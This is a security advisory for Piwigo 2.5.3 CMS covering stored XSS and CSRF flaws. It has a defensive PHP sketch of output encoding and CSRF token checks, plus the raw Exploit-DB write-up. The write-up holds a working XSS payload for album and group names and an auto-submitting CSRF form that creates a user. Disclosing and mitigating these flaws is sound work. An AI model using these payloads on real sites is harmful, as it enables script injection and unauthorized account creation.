Piwigo 2.5.3 CMS: Multiple Vulnerabilities
Vendor: Piwigo CMS
By: sajith
CVSS: 5.5 (MEDIUM)
Type: Stored XSS, CSRF
CWE: 79, 352
Product Name: Piwigo CMS
Affected Version From: Piwigo 2.5.3
Affected Version To: Piwigo 2.5.3
Patch Exists: NO


Piwigo CMS version 2.5.3 is vulnerable to stored XSS in multiple parameters and to CSRF. In the first vulnerability, an attacker can inject a malicious payload into the album name, where it is stored and executes arbitrary script code when the page is rendered. The payload also executes when managing albums. In the second vulnerability, an attacker can exploit the 'add a user' functionality using CSRF.

Mitigation:

Apply the latest patch or upgrade to a newer version of the CMS. Avoid using untrusted inputs in the album name or other parameters.
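
The two defensive controls that address these issues, output encoding for the stored album name and a per-session token check on the user-creation POST, are sketched below as an added example. This is not Piwigo's code: the helper names, the `csrf_token` field, the secret and the session id are all hypothetical, and the sample inputs are constructed from the values shown in the advisory.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: encode untrusted text (album name, group name)
// before placing it in HTML body or quoted-attribute context.
function esc_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hypothetical helper: derive an anti-CSRF token bound to the session.
// $secret is a server-side key that never leaves the server (assumption).
function csrf_token(string $sessionId, string $secret): string
{
    return hash_hmac('sha256', $sessionId, $secret);
}

// Accept a state-changing POST only if it carries the session's token.
// hash_equals() compares in constant time; non-string input is rejected.
function csrf_check(array $post, string $sessionId, string $secret): bool
{
    $sent = $post['csrf_token'] ?? '';
    return is_string($sent)
        && hash_equals(csrf_token($sessionId, $secret), $sent);
}

// Constructed demo values, not real credentials.
$secret    = 'constructed-demo-secret';
$sessionId = 'constructed-session-id';

// 1. Stored XSS: the album name from the advisory, rendered into an
//    attribute. After encoding, the quote and angle brackets are inert.
$albumName = '"><img src=x onerror=prompt(1);>';
echo '<input type="text" name="name" value="' . esc_html($albumName) . "\">\n";

// 2. CSRF: a cross-site form post with the PoC's fields. The attacking
//    page cannot read the victim's token, so the request has none.
$forged = [
    'login'      => 'crsfpoc123',
    'password'   => 'Password123@',
    'submit_add' => 'Submit',
];
var_dump(csrf_check($forged, $sessionId, $secret));

// The same request sent from the application's own form, which embeds
// the token in a hidden field.
$legit = $forged + ['csrf_token' => csrf_token($sessionId, $secret)];
var_dump(csrf_check($legit, $sessionId, $secret));
```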

Exploit-DB raw data:

###########################################################
[~] Exploit Title: Piwigo 2.5.3 CMS:Multiple vulnerability's
[~] Author: sajith
[~] version: Piwigo 2.5.3
[~]Vendor Homepage: http://piwigo.org
[~] vulnerable app link:http://www.piwigo.org/basics/downloads
###########################################################


[1] Stored XSS on Multiple parameters

    <1> Click on Add photos
(http://127.0.0.1/cms/piwigo/admin.php?page=photos_add) and click on
"create new album". In the album name enter the payload
"><img src=x onerror=prompt(1);>
and save it; we can see that our payload gets executed. We can also see
that when you click on the "albums" and "manage" functionality the
payload gets executed.


    <2> Click on users > groups, in the "group name" field add the above
XSS payload and click on save.


[2] CSRF vulnerability


    Click on users > manage, where the "add a user" functionality can be
exploited using the CSRF vulnerability (PoC shown below).


<html>
<head>
<title>POC by sajith shetty</title>
</head>
<body>
<form action="http://127.0.0.1/cms/piwigo/admin.php?page=user_list"
id="formid" method="post">
<input type="hidden" name="login" value="crsfpoc123" />
<input type="hidden" name="password" value="Password123@" />
<input type="hidden" name="email" value="xyz@aaww.com" />
<input type="hidden" name="send_password_by_mail" value="1" />
<input type="hidden" name="submit_add" value="Submit" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>